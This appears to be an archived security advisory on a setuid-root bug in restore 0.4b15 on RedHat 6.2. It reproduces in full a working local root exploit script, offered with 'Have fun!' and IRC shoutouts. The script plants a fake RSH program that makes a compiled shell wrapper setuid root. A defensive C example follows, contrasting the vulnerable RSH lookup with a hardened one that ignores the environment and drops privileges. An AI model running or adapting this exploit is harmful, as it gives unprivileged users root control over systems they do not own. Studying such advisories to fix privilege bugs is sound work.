COMMAND

    restore

SYSTEMS AFFECTED

    RedHat 6.2

PROBLEM

    'fish stiqz' found the following.  restore has the same problem as
    dump, described at:

        http://oliver.efri.hr/~crv/security/bugs/Linux/dump3.html

    When the tape argument names a remote host (host:file), restore
    version 0.4b15 runs the program named in the RSH environment
    variable to reach that host.  RSH is fully under the caller's
    control, and restore is installed setuid root, so the named program
    runs as root.  The exploit below points RSH at a script that turns
    a freshly compiled /bin/sh wrapper into a setuid-root binary.

    Exploit code:

    #!/bin/sh
    #
    # Exploits a stupid bug in redhat 6.2's (others..) restore program.
    # restore version 0.4b15 executes a program which is found in
    # a user modifiable environment variable (RSH).
    #
    # Have fun!
    #        - fish
    #
    # Shoutouts: trey, burke, dono, sinator, jadrax, minuway, lews, hubbs,
    #	     ralph, jen, madspin, hampton, ego, als, scorch.
    #
    #          Cause we da pimpz of #code! (not ef/dal.. etc)
    #                     (irc > irl ? werd : lame)
    #
    # WERD to the async, isolated, expedience, mindsong, and analog crews
    #
    #
    # #TelcoNinjas can eat it cause they suck hardc0re
    # #TelcoNinjas == #smurfkiddies
    #
    
    echo "[spl0it]: Starting."
    echo -n "[spl0it]: creating shell spawn... "
    
    # tiny setuid-shell wrapper; once execute_me has chown'd it to root
    # and set mode 4777, running it yields a root shell
    echo "#include <stdio.h>"                        > cool.c
    echo "#include <unistd.h>"                      >> cool.c
    echo "int main(void) { "                        >> cool.c
    echo "    setuid(0);"                           >> cool.c
    echo "    setgid(0);"                           >> cool.c
    echo "    execl(\"/bin/sh\", \"-bash\", NULL);" >> cool.c
    echo "    return 0;"                            >> cool.c
    echo "}"                                        >> cool.c
    
    echo -e "\t\t\tdone"
    
    echo -n "[sploit]: Compiling shell spawn... "
    gcc -o cool cool.c
    echo -e "\t\t\tdone"
    
    
    echo -n "[sploit]: Creating fake rsh program... "
    
    cat > execute_me << EOF
    #!/bin/sh
    chown root: cool
    chmod 4777 cool
    EOF
    
    chmod +x execute_me
    echo -e "\t\t\tdone"
    
    
    # now run the setuid restore binary against a bogus remote tape
    # (host:file); restore tries to reach the host via $RSH, so our
    # execute_me runs as root and makes ./cool setuid root
    echo "[spl0it]: Beginning exploitation: "
    export TAPE=garbage:garbage
    export RSH=./execute_me
    /sbin/restore -i
    
    
    # Exec'n the r00t sh3ll!
    echo -n "[spl0it]: Waiting 4 seconds for suid shell... "
    sleep 4
    echo -e "\t\tdone"
    
    if [ ! -u ./cool ]; then
      echo "[spl0it]: Hmm it didn't work.. Better luck next time eh"
      echo "[spl0it]: Check ./cool anyway =)"
      exit 0
    fi
    
    echo "[spl0it]: It Worked! suid shell is now ./cool"
    echo "[spl0it]: Entering suid shell..."
    ./cool
    exit 0
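
    The following C program is an added illustration, not part of the
    advisory or of the dump/restore sources.  It models the RSH
    selection that the exploit above abuses: rsh_vulnerable() is the
    pattern the advisory describes (exec whatever RSH says, with
    whatever privilege the process has), and rsh_hardened() is one
    correct alternative that ignores RSH whenever the real and
    effective uids differ, and then drops privileges before the exec.
    DEFAULT_RSH, the uid values and run_rsh() are assumptions for the
    example, not restore's actual code.

```c
/* Added example, not from the advisory or from the dump/restore sources.
 * Models the RSH-selection logic of a setuid-root restore: the vulnerable
 * pattern beside a hardened one. DEFAULT_RSH and the uid values are
 * assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define DEFAULT_RSH "/usr/bin/rsh"  /* assumed compiled-in default */

/* Vulnerable pattern, as the advisory describes restore 0.4b15:
 * whatever RSH names is exec'd with the process's (root) privileges. */
const char *rsh_vulnerable(const char *env_rsh)
{
    return env_rsh ? env_rsh : DEFAULT_RSH;
}

/* Hardened selection. Takes the uids as parameters so it can be unit
 * tested without actually installing the binary setuid. */
const char *rsh_hardened(uid_t ruid, uid_t euid, const char *env_rsh)
{
    /* Privilege not inherited from the caller: the environment belongs
     * to the attacker, so RSH is ignored and the default is used. */
    if (ruid != euid)
        return DEFAULT_RSH;
    /* Not privileged: honour RSH, but only as an absolute path, so a
     * relative name like ./execute_me cannot be planted in the cwd. */
    if (env_rsh == NULL || env_rsh[0] != '/')
        return DEFAULT_RSH;
    return env_rsh;
}

/* Permanently drop to the real uid/gid before exec'ing the helper, so
 * even a mis-chosen program cannot chown/chmod files as root.
 * Returns 0 on success, -1 if privileges could not be dropped. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0)
        return -1;
    if (setuid(ruid) != 0)
        return -1;
    /* Paranoia check: a non-root caller must not be able to become root. */
    if (ruid != 0 && setuid(0) == 0)
        return -1;
    return 0;
}

/* How restore would spawn the remote-shell helper safely: choose the
 * program with rsh_hardened(), drop privileges in the child, then exec.
 * Returns the child's exit status, or -1 on fork/wait failure. */
int run_rsh(const char *host, const char *cmd)
{
    const char *rsh = rsh_hardened(getuid(), geteuid(), getenv("RSH"));
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(127);
        execl(rsh, rsh, host, cmd, (char *)NULL);
        _exit(127);  /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* Constructed scenario: restore running setuid root (ruid 500,
     * euid 0) with RSH=./execute_me, exactly as the exploit sets it. */
    const char *attacker_rsh = "./execute_me";
    printf("vulnerable restore would exec: %s\n", rsh_vulnerable(attacker_rsh));
    printf("hardened restore would exec:   %s\n", rsh_hardened(500, 0, attacker_rsh));
    return 0;
}
```

    The uid comparison in rsh_hardened() is the part that defeats the
    script above: with ruid 500 and euid 0, RSH=./execute_me is never
    consulted.  On glibc systems secure_getenv() gives the same
    "ignore the environment when privileged" behaviour for any
    variable; the privilege drop in the child is defence in depth, so
    that a helper which is reached anyway cannot chown or chmod as root.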

SOLUTION

    Nothing yet.